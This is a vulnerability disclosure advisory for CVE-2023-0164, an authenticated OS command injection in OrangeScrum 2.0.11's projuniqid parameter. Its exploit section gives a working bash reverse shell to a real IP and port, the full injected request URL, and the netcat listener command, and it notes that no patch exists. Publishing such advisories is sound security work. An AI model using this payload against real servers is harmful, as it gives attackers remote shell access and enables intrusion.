OrangeScrum 2.0.11 - OS Command Injection via projuniqid

Summary

Vulnerability

Description

OrangeScrum version 2.0.11 allows an authenticated external attacker to execute arbitrary commands on the server. This is possible because the application injects an attacker-controlled parameter into a system function.

Vulnerability

This vulnerability occurs because the application injects an attacker-controlled parameter into a system function.

Exploit

To exploit this vulnerability, we just need to send the malicious command we want the server to execute through the projuniqid parameter using the $() syntax.

$(bash -i+>& /dev/tcp/67.205.165.158/3000 0>&1)

https://retr02332bughunter.orangescrum.com/log_times/download_pdf_timelog?projuniqid=$(bash+-i+>%26+/dev/tcp/67.205.165.158/3000+0>%261)&usrid=&date=&strddt=&enddt=&dt_format=d/m/y&checkedFields=date,usr_name,task_no,task_title,hours,description,start,end,break,billable

Thus, we will only have to execute the command nc -lvp 3000 on the attacker's malicious server to receive the reverse shell from the victim server.

Evidence of exploitation

Our security policy

We have reserved the ID CVE-2023-0164 to refer to this issue from now on.

• https://fluidattacks.com/advisories/policy/

System Information

• Version: OrangeScrum 2.0.11

• Operating System: GNU/Linux

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

References

Vendor page https://github.com/Orangescrum/orangescrum/

Timeline